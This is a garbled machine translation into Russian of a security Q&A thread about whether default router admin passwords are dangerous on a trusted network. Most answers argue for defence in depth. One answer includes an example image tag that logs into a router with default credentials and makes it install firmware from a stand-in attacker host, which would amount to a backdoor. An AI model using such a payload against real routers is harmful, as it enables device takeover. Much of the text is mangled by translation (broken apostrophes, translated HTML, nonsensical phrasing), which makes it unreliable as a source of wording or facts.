Есть много статьи Решение вреде маршрутизатора по умолчанию админ пароли. Некоторых приложений безопасности также обнаруживает маршрутизатор по умолчанию пароль администратора как уязвимость. Однако, в этих статьях сосредоточиться на том, что может случиться, если ваш роутер был взломан.
Но, предположим, у нас есть маршрутизатор настроен таким образом, что панель управления работает только в локальной сети. Кроме того, предположим, что пароль для подключения к сети (т. е. через WiFi) считается достаточно безопасным (т. е., очень высокая энтропия), и только проверенным пользователям разрешено в сети.
В этих условиях может маршрутизатор все еще быть под угрозой? Там еще нужно менять маршрутизатор по умолчанию пароль администратора? Мои мысли, что, если злоумышленник может'т попасть в сеть, они могут'т компромисс маршрутизатор независимо от маршрутизатора'пароль администратора С. Данный тип представляет собой возможность, но это может быть защищена от CSRF токена. Есть ли другие возможности я не'т рассматриваться?
> есть его опасно использовать маршрутизатор по умолчанию админ пароли, если только доверенные пользователи в сети?
Да, это'опасно. Вот еще несколько с "технической" и способов сделать это (не говорю, что это'ы плохо):
Вы могли быть с радостью посещая сайт, и там может быть любое количество вопросов, с его:
Грубый пример:
<ИМГ src="http://admin:[email protected]/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/>
Во многих случаях, CSRF-атаку, выиграл защиты'т помочь, если вы можете войти в с admin:admin@routerip по ссылке вроде этого. Она будет создавать новую сессию и маркер для вас, вместо того, чтобы использовать ваш текущий.
Поздравляю с новейшей установки маршрутизатора бэкдор(ТМ) с полным доступом оболочки.
Побег контекста и вставить `hax.js или просто JS-код, который может выполнять следующие функции:
<ИМГ СРЦ=" не то"/>
выше.Кроме того, `.изображения SVG могут обходить множество защита от XSS.
Кто-то входит в вашу беспроводную сеть, зашел на страницу конфигурации маршрутизатора и делает необходимые изменения/обновление прошивки/перенаправление DNS и все, что они хотят. Как и первый, но с точки и нажмите интерфейс вместо.
Имейте в виду, атак с XSS/CSRF-атаку, может существовать, или даже быть добавлены во время обновления, если поставщик является хрень.
Так Дон'т сделать это. Пожалуйста. Мое сердце может'т принять его. :(
Как вы правильно заметили CSRF атак-это возможность. Предотвращение атак CSRF-атаку возможно с CSRF-токен, но это ничего вы можете сделать как пользователя маршрутизатора. Так что если вы являетесь поставщиком маршрутизатора вы должны обязательно осуществить CSRF защиту, но как пользователь, вы должны жить с тем, что поставщик предлагает вам и многие поставщики Дон'т иметь надлежащее CSRF защиту.
За CSRF атак есть другие нападения, которые могут быть использованы против маршрутизатор. Аналогично CSRF атак, многие из этих использовать браузер в качестве батута, т. е. просто требуют посещения некоторых веб-сайт, который использует внедренный (как встроенных в рекламе) и Дон'т необходимость компромисса пользователя's компьютер. Среди них заметными являются межсайтовый скриптинг (XSS) и ДНС перепривязки атак. Вот снова поставщик может осуществлять надлежащую защиту в теории, но на практике это часто не делается.
И тогда даже доверенных пользователей может иметь свои системы скомпрометированы с помощью различных способов. В этом случае злоумышленник находится внутри доверенной сети и пароля по умолчанию делает его намного проще, чтобы захватить маршрутизатор и сделать злоумышленник'ы контроль над сетью более постоянный и менее очевиден таким образом.
Это означает, что даже если вы думаете, что у вас есть надлежащая защита, вам необходимо сменить пароль от дефолта в духе обороны в глубине. Чем больше неизвестных злоумышленник должен выяснить, чтобы проникнуть в сеть, тем тяжелее Вы делаете это для него, и лучше защитить вашу сеть. И конечно это касается не только пароля, но и общей безопасности маршрутизатора, т. е. некоторые маршрутизаторы имеют ошибки или даже бэкдоры, где вы Дон'т даже знать потребитель'пароль для поглощения. И это's не только маршрутизаторы, но вы также должны следить за другими устройствами, такими как принтеры, сканеры, смарт-лампочки, телевизор и т. д.
Да, маршрутизаторов были скомпрометированы вредоносных программ, выполняющихся внутри сети тестирование список паролей по умолчанию. Вредоносная программа проникает в сеть через зараженные фишинговые вложений, или использовать браузер.
Если у вас есть возможность проверить маршрутизатор может'т быть изменена за пределами локальной сети, вы не только иметь возможность менять пароль по умолчанию, у вас есть обязанность отремонтировать его.
Я нахожу это удивительным, что этот вопрос был задан, и я даже не специалист по безопасности. Это немного как спрашивать "и это нормально, чтобы оставить хранилище банка разблокированы, если разрешено в подвале только надежные кассиры?&и". Никто не знает, с чего начать отвечать. Я половину удивляться, если вопрос был Али стиль г заводную, отвечал за спорт.
По умолчанию пароль на что-нибудь вообще - это немного лучше, чем системы, не используя пароль. В каком-то смысле это даже хуже, потому что рождает иллюзию защиты паролем (который может быть основанием предположения о том, какие другие части системы'ы безопасности, надежности, в системе сдержек и противовесов и компенсирующие меры), тогда как в действительности информированный человек со злобой намерения сейчас. Он становится своего рода задняя дверь для тех, кто там в курсе. Тестерам регулярно делать демонстрации в его ярмарках, как легко искать пароли по умолчанию в поставщиков' листы технических данных и в интернете.
Проблемы с паролем по умолчанию идут, чтобы получить намного хуже, когда Интернет вещей, что окончательный пример предложения без спроса, разойдется. Я до сих пор не оправилась от просмотра проецируемого отображения всех взломать интернет чайники (да, действительно) в Лондоне, которые были раскрывая их владелец's компьютер IP и обучения камерой оборудованной куклы, которые были превращены в отдаленных шпионит за своими пользователями и перепрограммировать ругаться ненормативной лексикой.
Да!
Ты не будешь использовать имя Пользователя по умолчанию и пароль
Вот почему:
CSRF в возможность, но это может быть защищена от CSRF атак маркер.
Нажмите.. ни один из маршрутизаторов уже установили его на свои интерфейсы. В 23-м веке, вероятно, они будут.
Даже доверенный пользователь может иметь свою машину взломали. Используя это в качестве отправной точки, злоумышленник может получить полный доступ к вашему маршрутизаторы. Другими словами, вы бы снизили защиту в случае нападения изнутри. Это классический пример того ошарашена -- Троянский конь.
Если какое бы устройство вы используете для беспроводной точке доступа, попадает под угрозу...если эта сеть конфиденциальную информацию на нем, вы'ре собирается закончиться плохо.
Это крайне маловероятно, что кто-то собирается эксплуатировать уязвимость на вашем беспроводном маршрутизаторе? Да.
Это возможно? Да.
Если вы хоть отдаленно серьезное о сетевой безопасности вы всегда должны изменить пароль по умолчанию на маршрутизаторе!
Кроме достойных безопасности корпоративных устройств (скажем, те, которые выполняют рутинную сети сканирует, коды, пользовательские файлы hosts - все, что прикольных вещей) там еще ничего не позволяет вредоносным программам получать в сети и используя тот факт, что ваши пароли установлено по умолчанию.
В конце концов, конечных пользователей собираетесь получить ваш сеть зараженных.
Его не может быть, это просто вопрос времени.
Сказать 'ян в бухгалтерском учете' 86 лет и разбирается в информационной безопасности.
Она более опасна, чем все другие угрозы, с которыми вы можете столкнуться на ежедневной основе.
Изменить свой пароль. Изменить имя Пользователя по умолчанию.
Вы можете выполнить все виды защитных мер и по-прежнему быть скомпрометированы в результате имя пользователя и пароль по умолчанию. Недовольный сотрудник, кто-то умный и до сих пор учусь скрипт кидди (во время принести ребенка на работу день), все виды вещей может случиться.
Зачем брать рост на предприятии?
И когда вы меняете этот пароль на любви к Богу Дон'т сделать что-нибудь глупое. Я'вэ видел настройки сети (открытые акции ж/всем разрешение...все кричали, что и где это...что есть до безобразия чувствительная информация о них) и пароль....в обращенной наружу маршрутизатор-это что-то сродни '1234#businessname' .... Я немного чувствую себя обязанным обратиться к своим клиентам, и пусть они знают, что они наняли его управляющей компании, которая не'т принять безопасности серьезно.
Потом опять у меня есть более важные дела.
Всякий раз, когда они попали с CryptoLocker они'll итоге сталкиваются с последствиями.
Потерять 50к $/год клиент действительно может навредить маленькому компании.
Это может оторваться, как злыдня, но если вы ленивы достаточно, чтобы не менять пароль по умолчанию, потому что устройство находится в изолированной сети, что's, чтобы сказать кому-то было'т одинаково ленивы в настройке защищенной сети. Кроме того, доступ через WiFi опровергает идею, что эта сеть является достаточно безопасной. Единственный способ физически изолировать сетевое устройство такое, что пароль по умолчанию будет в безопасности, можно было бы ничего не подключено к нему (в том числе мощность), накрыть его в бетон, а потом бросьте в Марианскую впадину. Затем вы'd по-прежнему придется беспокоиться о Джеймс Кэмерон, получая доступ к нему.
Я обеспокоен, думая, за "Мой мысли, что, если злоумышленник может'т попасть в сеть, они могут'"и Т компромисс маршрутизатор...&;. Это, кажется, предал полное отсутствие понимания принципа сегрегации в хорошей безопасности.
Один управляет рисками с помощью соответствующих мер, напрямую применимые к откуда оно возникает, а не загружать всех один'с опорой на косвенные последствия глобального или более отдаленно расположенные элементы управления в другом месте.
Корабли, как ожидается, не пускать воду в (хорошие периметр безопасности), но предприимчивые Корабел по-прежнему подходит переборки под палубой, так что любое проникновение воды, что действительно происходит в нарушение всех прекрасный дизайн усилия в другом месте все еще находится на небольшой площади (ограничения ущерба путем компартментализации). В обреченно имени Геральд свободного кроя предприятия расходы, не удосужившись подогнать переборки. На 6 марта 1987 года, через ошибки оператора его в воде, через открытым носом двери. В нем перечислены яростно и потребовалось всего 90 секунд, чтобы перевернуться, а едва вышли из гавани. 193 человека погибли в ледяной воде.
Я'м интересно, если есть некоторые неявные думать за оригинальный вопрос, который идет, "один риск: таким образом, один элемент управления, чтобы отсортировать ее". А на самом деле взаимосвязь между рисками и контроля много-много, не один-один.
Вы, возможно, автосигнализация. Этот контроль охватывает риски кражи портативного вещи из машины, и он также рассматривается отдельный риск того, что автомобиль забрали и увезли. (я): один элемент управления; более одного связанного с ними риска.
У вас также есть запирающаяся дверь автомобиля. Это другой элемент управления, но это касается двух вышеупомянутых рисков.
Каждый риск рассматривается более чем одним органом управления (сигнализации и блокировки дверей). Так что (II): Одна риска (принимая каждый в свою очередь); более чем одно управление.
Вы бы'т перестают беспокоить замка двери автомобиля только потому, что у вас есть автосигнализации. И от угона автомобиля у вас может быть Krooklok аппарата или руль бар или зажигание пароль или сигнал, или удаленный GPS слежение (три, четыре или даже пять элементов управления в отношении одного риска). Против последующих попыток, чтобы продать или Клон ТС, у вас есть номер шасси врезалось в лобовое стекло и, как минимум, одно секретное место (делая до шести элементов от кражи автомобиля или его прямые последствия).
Ни один из этих элементов является лишним только потому, что другие стоят на месте, хотя я думаю, что большинство из нас будет рассматривать все шесть как перебор и не заморачиваться с неудобством капризная сигнализации или громоздкого физического устройства, которая должна быть разблокирована, если менее обременительным безопасности тоже на месте.
В целом, отношения между рисками и контроля, что лечить их не один к одному, и это относится к сетям и маршрутизаторами или что-нибудь еще.
Вы, возможно, слышали, "и лучше предотвратить, чем лечить" от. <БР> Дон'т быть таким ленивым, что вы Дон'т даже хочу изменить пароль по умолчанию для роутеров. Это базовые 101 класс. Всегда изменить пароль по умолчанию. Не'т имеет значения, насколько безопасны условия сегодня. Они меняются со временем. Вы никогда не знаете, какого рода атаки будут изобретены в будущем. Держать себя за все.<БР>
Как правило, не опираются на единую точку отказа. Каждый здесь имеет действительных точек. Если кто-то действительно хочет в сети, это's действительно только вопрос времени, прежде чем они имеют доступ. Будет ли это'ы брутфорс-атаки, DDoS-атаки или просто какой-то "социальной инженерии", которая одной из ваших прошедших проверку подлинности пользователей в заблуждение своих полномочий, в конечном счете, единой точки отказа не удастся. Обеспечить все самое важное в вашей сети, как он подключен к интернету напрямую. Также имейте в виду, если вы храните конфиденциальную информацию клиентов, вы несете ответственность в суде, если он будет утечка.
В принципе этого даже не потребуется время, чтобы развернуть. Если ваша модель поставляется маршрутизатор создан с явно не случайный пароль, производитель даже не пытается look в безопасности; они должны считаться ненадежными. Производители пытаются продать дешевые роутеры, как известно, не стоит давать благо doubt](http://arstechnica.com/security/2014/04/easter-egg-dsl-router-patch-merely-hides-backdoor-instead-of-closing-it/). Теперь у вас есть ненадежный маршрутизатор. Как вы говорите, это будет очень серьезным фактором риска.
Маршрутизаторы места как только доверенные пользователи (даже без учета внешних портов) не являются общими.
Домашние системы хозяина смартфонов с низкого уровня безопасности (обновления), как один из примеров.
Бизнес-систем принимающих пользователей, которые не должны, как правило, изменение параметров инфраструктуры.
Сетей созданы в качестве упражнения четко должны'т использовать небезопасных настроек только потому, что вы можете уйти с ним; осуществление побежден. (Исключение: упражнение специально для того, чтобы продемонстрировать небезопасные по умолчанию).
Сетей для тестирования все-таки заслуживают определенного ухода за. В некоторых случаях вы ожидаете их, чтобы соответствовать вашему описанию. Однако в определении этого, вы будете принимать точку опуская стандарт безопасности. Опять же, в принципе у вас нет причин саботировать систему такой.
Diceware немного раздражает, но это уменьшает проблему создания достойных случайных чисел. В Google сайт создать вам страницу случайные броски кубиков, и выбрать роллы случайным образом. Лента пароль к роутеру, и там вы идете.